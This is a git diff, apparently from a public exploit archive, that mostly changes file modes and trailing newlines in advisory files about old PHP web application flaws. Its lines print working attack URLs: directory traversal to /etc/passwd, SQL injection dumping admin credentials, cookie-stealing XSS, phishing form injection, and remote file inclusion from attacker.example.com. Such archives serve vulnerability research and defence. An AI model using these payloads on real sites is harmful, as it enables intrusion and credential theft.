http://www.example.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric http://www.example.com/modules/WebChat/in.php http://www.example.com/modules/WebChat/quit.php -http://www.example.com/modules/WebChat/users.php \ No newline at end of file +http://www.example.com/modules/WebChat/users.php \ No newline at end of file diff --git a/platforms/php/webapps/22705.txt b/platforms/php/webapps/22705.txt old mode 100755 new mode 100644 index 577f71f6d..05d869d72 --- a/platforms/php/webapps/22705.txt +++ b/platforms/php/webapps/22705.txt @@ -6,4 +6,4 @@ http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../targetfil http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/passwd -http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/issue \ No newline at end of file +http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/issue \ No newline at end of file diff --git a/platforms/php/webapps/22708.txt b/platforms/php/webapps/22708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22709.txt b/platforms/php/webapps/22709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2271.txt b/platforms/php/webapps/2271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22710.txt b/platforms/php/webapps/22710.txt old mode 100755 new mode 100644 index 7ea361204..b3a860a29 --- a/platforms/php/webapps/22710.txt +++ b/platforms/php/webapps/22710.txt @@ -35,5 +35,4 @@ --end- - \ No newline at end of file +-end- \ No newline at end of file diff --git a/platforms/php/webapps/22711.txt b/platforms/php/webapps/22711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22712.txt b/platforms/php/webapps/22712.txt old mode 100755 new mode 100644 index 981133d21..93b5d5e27 --- a/platforms/php/webapps/22712.txt +++ b/platforms/php/webapps/22712.txt @@ -46,5 +46,4 @@ -end- --end- - \ No newline at end of file +-end- \ No newline at end of file diff --git a/platforms/php/webapps/22713.txt b/platforms/php/webapps/22713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22715.txt b/platforms/php/webapps/22715.txt old mode 100755 new mode 100644 index 4f3be3545..854350e92 --- a/platforms/php/webapps/22715.txt +++ b/platforms/php/webapps/22715.txt @@ -6,4 +6,4 @@ The issue presents itself when a malicious request is made for the WebChat ?user This weakness was reported to affect WebChat version 2.0 other versions may also be affected. -http://www.example.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] \ No newline at end of file +http://www.example.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] \ No newline at end of file diff --git a/platforms/php/webapps/22716.txt b/platforms/php/webapps/22716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22717.txt b/platforms/php/webapps/22717.txt old mode 100755 new mode 100644 index b8e85f446..67ade0508 --- a/platforms/php/webapps/22717.txt +++ b/platforms/php/webapps/22717.txt @@ -13,4 +13,4 @@ ameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME> ?script> alert(document.cookie); ?/script> ------ Source Code For attack.htm ----- \ No newline at end of file +----- Source Code For attack.htm ----- \ No newline at end of file diff --git a/platforms/php/webapps/2272.txt b/platforms/php/webapps/2272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22725.txt b/platforms/php/webapps/22725.txt old mode 100755 new mode 100644 index 11fdb4798..79ad82dc3 --- a/platforms/php/webapps/22725.txt +++ b/platforms/php/webapps/22725.txt @@ -4,4 +4,4 @@ Scripts that include the PHP phpinfo() debugging function may be prone to cross- http://www.example.com/info.php?variable=[code] -where [code] equals hostile HTML or script code. \ No newline at end of file +where [code] equals hostile HTML or script code. \ No newline at end of file diff --git a/platforms/php/webapps/2273.txt b/platforms/php/webapps/2273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22735.txt b/platforms/php/webapps/22735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22736.txt b/platforms/php/webapps/22736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22741.txt b/platforms/php/webapps/22741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22742.txt b/platforms/php/webapps/22742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2275.txt b/platforms/php/webapps/2275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22750.txt b/platforms/php/webapps/22750.txt old mode 100755 new mode 100644 index 0af90e627..3c9db7b82 --- a/platforms/php/webapps/22750.txt +++ b/platforms/php/webapps/22750.txt @@ -10,4 +10,4 @@ cmd=pwd http://www.example.com/zentrack/www/index.php?libDir=http:// [attacker]/test/&cmd=pwd -http://www.exmaple.com/zentrack/index.php?configFile=/../../../../../etc/passwd \ No newline at end of file +http://www.exmaple.com/zentrack/index.php?configFile=/../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/22760.txt b/platforms/php/webapps/22760.txt old mode 100755 new mode 100644 index bacccaf4c..59a925912 --- a/platforms/php/webapps/22760.txt +++ b/platforms/php/webapps/22760.txt @@ -6,4 +6,4 @@ It has been reported that an attacker, may connect to the HostingDirector server http://www.example.com/[INSTALLATION PATH]/dev/VDS/submitted.php?[TARGET USER]\activeservices\http||watchdog_running=[false]&restart_vds=on&success_m -sg=Remote USER VDS restarted trough this kind of attack/watch dog disabled. \ No newline at end of file +sg=Remote USER VDS restarted trough this kind of attack/watch dog disabled. \ No newline at end of file diff --git a/platforms/php/webapps/22761.txt b/platforms/php/webapps/22761.txt old mode 100755 new mode 100644 index 463978f24..45fa14354 --- a/platforms/php/webapps/22761.txt +++ b/platforms/php/webapps/22761.txt @@ -9,4 +9,4 @@ d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent _id=0 http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert -(document.cookie);%3E&op=modload&name=Members_List&file=index \ No newline at end of file +(document.cookie);%3E&op=modload&name=Members_List&file=index \ No newline at end of file diff --git a/platforms/php/webapps/22762.txt b/platforms/php/webapps/22762.txt old mode 100755 new mode 100644 index 28f0af016..e124fc72c --- a/platforms/php/webapps/22762.txt +++ b/platforms/php/webapps/22762.txt @@ -26,4 +26,4 @@ re%20comes%20your%20XSS%20Attack&error=Either+user+or+password+are+incorrect +,+please+re-fill+in+. https://[TARGET]/[INSTALLATION -PATH]/login/sm_login_screen.php?uid="><h1>XSS%20! \ No newline at end of file +PATH]/login/sm_login_screen.php?uid="><h1>XSS%20! \ No newline at end of file diff --git a/platforms/php/webapps/22766.txt b/platforms/php/webapps/22766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22767.txt b/platforms/php/webapps/22767.txt old mode 100755 new mode 100644 index d98b01675..5a15ec46a --- a/platforms/php/webapps/22767.txt +++ b/platforms/php/webapps/22767.txt @@ -6,4 +6,4 @@ Exploitation could allow for theft of cookie-based authentication credentials. O http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22 %3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelu -cas.com \ No newline at end of file +cas.com \ No newline at end of file diff --git a/platforms/php/webapps/22776.txt b/platforms/php/webapps/22776.txt old mode 100755 new mode 100644 index e1481b6a7..e418cb75f --- a/platforms/php/webapps/22776.txt +++ b/platforms/php/webapps/22776.txt @@ -10,4 +10,4 @@ or http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with: -http://attacker.example.com/config/badcode.txt \ No newline at end of file +http://attacker.example.com/config/badcode.txt \ No newline at end of file diff --git a/platforms/php/webapps/2279.txt b/platforms/php/webapps/2279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22791.txt b/platforms/php/webapps/22791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22792.txt b/platforms/php/webapps/22792.txt old mode 100755 new mode 100644 index a0d73706b..f9bae1299 --- a/platforms/php/webapps/22792.txt +++ b/platforms/php/webapps/22792.txt @@ -11,4 +11,4 @@ All actions carried out by an authenticated user are done with their own local s It should also be noted that the vendor has announced that the privilege elevation issue is indeed legitimate. In the future this BID will be re-used to cover that vulnerability alone. -http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file:plugins/administrator/admins//&off=true&key=$ \ No newline at end of file +http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file:plugins/administrator/admins//&off=true&key=$ \ No newline at end of file diff --git a/platforms/php/webapps/22793.txt b/platforms/php/webapps/22793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22798.txt b/platforms/php/webapps/22798.txt old mode 100755 new mode 100644 index 1a7c8c760..88c6320d8 --- a/platforms/php/webapps/22798.txt +++ b/platforms/php/webapps/22798.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7963/info A vulnerability has been reported for phpMyAdmin that may reveal the contents of directories to remote attackers. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, dot-dot-slash '../' directory traversal sequences are not sufficiently sanitized from URI parameters. -http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=[../../../] \ No newline at end of file +http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=[../../../] \ No newline at end of file diff --git a/platforms/php/webapps/22808.txt b/platforms/php/webapps/22808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22809.txt b/platforms/php/webapps/22809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22810.txt b/platforms/php/webapps/22810.txt old mode 100755 new mode 100644 index b7dc085b4..3027e213e --- a/platforms/php/webapps/22810.txt +++ b/platforms/php/webapps/22810.txt @@ -4,4 +4,4 @@ Reportedly, pMachine is vulnerable to a cross-site scripting attack. The vulnera An attacker may exploit this vulnerability by enticing a victim user to follow a malicious link. Attacker-supplied code passed as the keywords URI parameter may execute within the context of the site hosting the vulnerable software when the malicious link is visited. -http://www.example.com/Path_To_pMachine/search/index.php?weblog=name_of_weblog&keywords=<script code> \ No newline at end of file +http://www.example.com/Path_To_pMachine/search/index.php?weblog=name_of_weblog&keywords=<script code> \ No newline at end of file diff --git a/platforms/php/webapps/22812.txt b/platforms/php/webapps/22812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22818.txt b/platforms/php/webapps/22818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22819.txt b/platforms/php/webapps/22819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2282.txt b/platforms/php/webapps/2282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22820.txt b/platforms/php/webapps/22820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22821.txt b/platforms/php/webapps/22821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22826.txt b/platforms/php/webapps/22826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22828.txt b/platforms/php/webapps/22828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22829.txt b/platforms/php/webapps/22829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22841.txt b/platforms/php/webapps/22841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22842.txt b/platforms/php/webapps/22842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22845.txt b/platforms/php/webapps/22845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2285.txt b/platforms/php/webapps/2285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22853.txt b/platforms/php/webapps/22853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22874.txt b/platforms/php/webapps/22874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22877.txt b/platforms/php/webapps/22877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2288.php b/platforms/php/webapps/2288.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22881.txt b/platforms/php/webapps/22881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22886.txt b/platforms/php/webapps/22886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22887.txt b/platforms/php/webapps/22887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22896.txt b/platforms/php/webapps/22896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2290.txt b/platforms/php/webapps/2290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22901.txt b/platforms/php/webapps/22901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22906.txt b/platforms/php/webapps/22906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22907.txt b/platforms/php/webapps/22907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2291.php b/platforms/php/webapps/2291.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22910.html b/platforms/php/webapps/22910.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2292.txt b/platforms/php/webapps/2292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22922.txt b/platforms/php/webapps/22922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22925.txt b/platforms/php/webapps/22925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22927.txt b/platforms/php/webapps/22927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22929.txt b/platforms/php/webapps/22929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2293.txt b/platforms/php/webapps/2293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22936.txt b/platforms/php/webapps/22936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22937.txt b/platforms/php/webapps/22937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22940.txt b/platforms/php/webapps/22940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22941.txt b/platforms/php/webapps/22941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22942.txt b/platforms/php/webapps/22942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22948.txt b/platforms/php/webapps/22948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2295.txt b/platforms/php/webapps/2295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22953.txt b/platforms/php/webapps/22953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22955.html b/platforms/php/webapps/22955.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22956.txt b/platforms/php/webapps/22956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22958.txt b/platforms/php/webapps/22958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22960.txt b/platforms/php/webapps/22960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22961.txt b/platforms/php/webapps/22961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22977.txt b/platforms/php/webapps/22977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2298.php b/platforms/php/webapps/2298.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22986.txt b/platforms/php/webapps/22986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2299.php b/platforms/php/webapps/2299.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22990.txt b/platforms/php/webapps/22990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22995.txt b/platforms/php/webapps/22995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22997.txt b/platforms/php/webapps/22997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22998.txt b/platforms/php/webapps/22998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23000.txt b/platforms/php/webapps/23000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23001.txt b/platforms/php/webapps/23001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23008.txt b/platforms/php/webapps/23008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23009.txt b/platforms/php/webapps/23009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2301.txt b/platforms/php/webapps/2301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23010.txt b/platforms/php/webapps/23010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23011.txt b/platforms/php/webapps/23011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23012.txt b/platforms/php/webapps/23012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23013.txt b/platforms/php/webapps/23013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23014.txt b/platforms/php/webapps/23014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23015.txt b/platforms/php/webapps/23015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23016.txt b/platforms/php/webapps/23016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23017.txt b/platforms/php/webapps/23017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23018.txt b/platforms/php/webapps/23018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23020.txt b/platforms/php/webapps/23020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23026.txt b/platforms/php/webapps/23026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23027.txt b/platforms/php/webapps/23027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23028.txt b/platforms/php/webapps/23028.txt old mode 100755 new mode 100644 index 6943f7078..ac6c88c4d --- a/platforms/php/webapps/23028.txt +++ b/platforms/php/webapps/23028.txt @@ -13,5 +13,4 @@ ## http://www.example.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23 ########################################################################## # 0x31337.net -########################################################################## - \ No newline at end of file +########################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/23029.txt b/platforms/php/webapps/23029.txt old mode 100755 new mode 100644 index cd1e23aa1..0352a0f42 --- a/platforms/php/webapps/23029.txt +++ b/platforms/php/webapps/23029.txt @@ -14,5 +14,4 @@ ## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23 ########################################################################## # 0x31337.net -########################################################################## - \ No newline at end of file +########################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/23031.txt b/platforms/php/webapps/23031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23036.txt b/platforms/php/webapps/23036.txt old mode 100755 new mode 100644 index 08450b76b..36d0d19c1 --- a/platforms/php/webapps/23036.txt +++ b/platforms/php/webapps/23036.txt @@ -4,4 +4,4 @@ MatrikzGB Guestbook is prone to a vulnerability that may permit guestbook users http://www.example.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass -where regularuser and regularpass equal the user credentials of the attacker. \ No newline at end of file +where regularuser and regularpass equal the user credentials of the attacker. \ No newline at end of file diff --git a/platforms/php/webapps/23039.txt b/platforms/php/webapps/23039.txt old mode 100755 new mode 100644 index db50817a4..d7b04999b --- a/platforms/php/webapps/23039.txt +++ b/platforms/php/webapps/23039.txt @@ -8,4 +8,4 @@ The problem is reported to be present in Fusion News 3.3, however older versions http://www.example.com/FusionNews/? id=signup&username=DarkKnight&email=EMAIL@EMAIL.COM+&password=123456&icon= -&le=3 \ No newline at end of file +&le=3 \ No newline at end of file diff --git a/platforms/php/webapps/2304.txt b/platforms/php/webapps/2304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2305.txt b/platforms/php/webapps/2305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23057.txt b/platforms/php/webapps/23057.txt old mode 100755 new mode 100644 index 2147ad7f8..22ce1bb56 --- a/platforms/php/webapps/23057.txt +++ b/platforms/php/webapps/23057.txt @@ -4,4 +4,4 @@ A file include vulnerability has been reported in the nphpd.php module of newsPH The issue is reported to exist in the LangFile variable of nphpd.php module of the software. Successful exploitation may lead to execution of arbitrary code on a vulnerable system by a remote attacker. -http://www.example.com/nphp/nphpd.php?nphp_config[LangFile]=/evil/file \ No newline at end of file +http://www.example.com/nphp/nphpd.php?nphp_config[LangFile]=/evil/file \ No newline at end of file diff --git a/platforms/php/webapps/23058.txt b/platforms/php/webapps/23058.txt old mode 100755 new mode 100644 index b7ac4054e..391f9ff5c --- a/platforms/php/webapps/23058.txt +++ b/platforms/php/webapps/23058.txt @@ -9,4 +9,4 @@ pword=a& uname=[fake usernamehere]& nphp_users[user index here][0]=a& nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661& -nphp_users[user index here][3]=5 \ No newline at end of file +nphp_users[user index here][3]=5 \ No newline at end of file diff --git a/platforms/php/webapps/23060.txt b/platforms/php/webapps/23060.txt old mode 100755 new mode 100644 index 43ecc0e0a..be8556d87 --- a/platforms/php/webapps/23060.txt +++ b/platforms/php/webapps/23060.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Py-Membres that allows remote attackers to Reportedly, Py-Membres does not fully check some URI parameters. Thus it is possible for an attacker to manipulate URI parameters and log into the system as an administrative user without the need for passwords. -http://www.example.com/admin/admin.php?adminpy=1 \ No newline at end of file +http://www.example.com/admin/admin.php?adminpy=1 \ No newline at end of file diff --git a/platforms/php/webapps/23061.txt b/platforms/php/webapps/23061.txt old mode 100755 new mode 100644 index b1079719d..671351c16 --- a/platforms/php/webapps/23061.txt +++ b/platforms/php/webapps/23061.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Py-Membres that allows remote attackers to It has been reported that an input validation error exists in the pass_done.php file included with Py-Membres. Because of this, a remote attacker may launch SQL injection attacks through the software. -http://www.example.com/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt \ No newline at end of file +http://www.example.com/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt \ No newline at end of file diff --git a/platforms/php/webapps/23064.txt b/platforms/php/webapps/23064.txt old mode 100755 new mode 100644 index 6847269ea..592c4ab46 --- a/platforms/php/webapps/23064.txt +++ b/platforms/php/webapps/23064.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/8502/info An SQL injection vulnerability has been reported in Attila PHP that could allow an attacker to gain unauthorized privileged access to a target site. This could be accomplished by requesting a URI including parameters designed to influence the results of specific user verification checks. Privileged access to a site implementing Attila PHP could allow an attacker to gain sensitive information or launch other attacks. Set the URI parameter "cook_id" to the value "0 OR visiteur=1" in a request to -http://www.example.org/index.php3 \ No newline at end of file +http://www.example.org/index.php3 \ No newline at end of file diff --git a/platforms/php/webapps/23065.txt b/platforms/php/webapps/23065.txt old mode 100755 new mode 100644 index dcaeb3368..6236878ec --- a/platforms/php/webapps/23065.txt +++ b/platforms/php/webapps/23065.txt @@ -4,4 +4,4 @@ cross-site scripting vulnerability has been reported for miniPortail. The vulner An attacker could exploit this issue to execute arbitrary HTML code in the browser of a remote user who follows a malicious link. -http://www.example.com/?lng=<script> \ No newline at end of file +http://www.example.com/?lng=<script> \ No newline at end of file diff --git a/platforms/php/webapps/23067.txt b/platforms/php/webapps/23067.txt old mode 100755 new mode 100644 index 4583c8e45..6c62b5c45 --- a/platforms/php/webapps/23067.txt +++ b/platforms/php/webapps/23067.txt @@ -8,4 +8,4 @@ Version 8.2: http://www.example.com/mod.php?mod=<evil_code> Version 8.3: -http://www.example.com/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul \ No newline at end of file +http://www.example.com/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul \ No newline at end of file diff --git a/platforms/php/webapps/2307.txt b/platforms/php/webapps/2307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23072.txt b/platforms/php/webapps/23072.txt old mode 100755 new mode 100644 index e34b08b1c..98a8e2dff --- a/platforms/php/webapps/23072.txt +++ b/platforms/php/webapps/23072.txt @@ -5,4 +5,4 @@ The 'invitefriends.php3' script of Ezboard has been reported prone to cross-site It should be noted that it is currently unknown which versions of Ezboard are affected by this vulnerability. This bid will be updated as further information is made available. http://www.example.com/invitefriends.php3?action=http://www.server.org&yourName=%22%3E%3Cp%3E%3Cb%3EYou%20must%20enter%20your%20password%20to%20invite%20a%20friend%3C/b%3E%3Cp%3E%3Cinput%20type=password%20name=pass%3E%3 -Cp%3E%3Cb%3EEnter%20your%20friend%20address%3C/b%3E%3Cp%3E%3Cinput%20type=text%20name=mail%3E%3C/form%3E%3C!-- \ No newline at end of file +Cp%3E%3Cb%3EEnter%20your%20friend%20address%3C/b%3E%3Cp%3E%3Cinput%20type=text%20name=mail%3E%3C/form%3E%3C!-- \ No newline at end of file diff --git a/platforms/php/webapps/2308.txt b/platforms/php/webapps/2308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23084.txt b/platforms/php/webapps/23084.txt old mode 100755 new mode 100644 index 2e987d1f1..0823281a9 --- a/platforms/php/webapps/23084.txt +++ b/platforms/php/webapps/23084.txt @@ -10,4 +10,4 @@ ICQ: 11111111 Homepage: http://www.zone-h.org -Message:<script>alert('Zone-H')</script> \ No newline at end of file +Message:<script>alert('Zone-H')</script> \ No newline at end of file diff --git a/platforms/php/webapps/2309.txt b/platforms/php/webapps/2309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23099.txt b/platforms/php/webapps/23099.txt old mode 100755 new mode 100644 index 3052cacb2..26ff9e340 --- a/platforms/php/webapps/23099.txt +++ b/platforms/php/webapps/23099.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities may allow a remote attacker to http://www.example.com/webcalendar/view_m.php?id=additional sql command http://www.example.com/webcalendar/login.php?user='additional%20sqlcommand -http://www.example.com/webcalendar/login.php?password='additional%20sql%20command \ No newline at end of file +http://www.example.com/webcalendar/login.php?password='additional%20sql%20command \ No newline at end of file diff --git a/platforms/php/webapps/2310.php b/platforms/php/webapps/2310.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23103.txt b/platforms/php/webapps/23103.txt old mode 100755 new mode 100644 index 41c2656bf..43c9824f9 --- a/platforms/php/webapps/23103.txt +++ b/platforms/php/webapps/23103.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8551/info A problem has been reported in the checking of input by Digital Scribe, potentially allow for cross-site scripting attacks. Because of this, it may be possible for an attacker to steal cookie authentication credentials or launch other attacks. -http://www.example.com/login.php?error=<script>(document.cookie)</script> \ No newline at end of file +http://www.example.com/login.php?error=<script>(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/23105.txt b/platforms/php/webapps/23105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23106.txt b/platforms/php/webapps/23106.txt old mode 100755 new mode 100644 index 62d6084e6..a7b197bba --- a/platforms/php/webapps/23106.txt +++ b/platforms/php/webapps/23106.txt @@ -11,7 +11,4 @@ About 225 results (0.21 seconds) The vulnerability lies in the eventform.php file. -Entering your JavaScript into the form boxes and saving the event will store and trigger your persistent XSS script. Simplez. Have fun. - - - \ No newline at end of file +Entering your JavaScript into the form boxes and saving the event will store and trigger your persistent XSS script. Simplez. Have fun. \ No newline at end of file diff --git a/platforms/php/webapps/2311.txt b/platforms/php/webapps/2311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2312.txt b/platforms/php/webapps/2312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23125.txt b/platforms/php/webapps/23125.txt old mode 100755 new mode 100644 index da4e68708..afc740905 --- a/platforms/php/webapps/23125.txt +++ b/platforms/php/webapps/23125.txt @@ -7,4 +7,4 @@ An attacker may exploit this issue to steal cookie-based authentication credenti [url=http://www.example.com" onclick="alert('Hello')]text[/url] -[url=http://www.example.com" onclick=alert("bug");"]test[/url] \ No newline at end of file +[url=http://www.example.com" onclick=alert("bug");"]test[/url] \ No newline at end of file diff --git a/platforms/php/webapps/23129.txt b/platforms/php/webapps/23129.txt old mode 100755 new mode 100644 index abf1b7ba0..424ae8f8f --- a/platforms/php/webapps/23129.txt +++ b/platforms/php/webapps/23129.txt @@ -5,4 +5,4 @@ Invision Power Board is prone to a cross-site scripting vulnerability. It has be http://www.example.com/index.php?showtopic='><script>window.open (window.location.search.substring(79)) </script>http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision -http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext> \ No newline at end of file +http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext> \ No newline at end of file diff --git a/platforms/php/webapps/2313.txt b/platforms/php/webapps/2313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2314.txt b/platforms/php/webapps/2314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23140.txt b/platforms/php/webapps/23140.txt old mode 100755 new mode 100644 index ea34b1655..610e3b1d3 --- a/platforms/php/webapps/23140.txt +++ b/platforms/php/webapps/23140.txt @@ -6,4 +6,4 @@ http://www.example.org/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcG It should be noted that the above base64 encoded string contains the following data: -' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1 \ No newline at end of file +' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1 \ No newline at end of file diff --git a/platforms/php/webapps/2315.txt b/platforms/php/webapps/2315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23158.txt b/platforms/php/webapps/23158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23159.txt b/platforms/php/webapps/23159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2316.txt 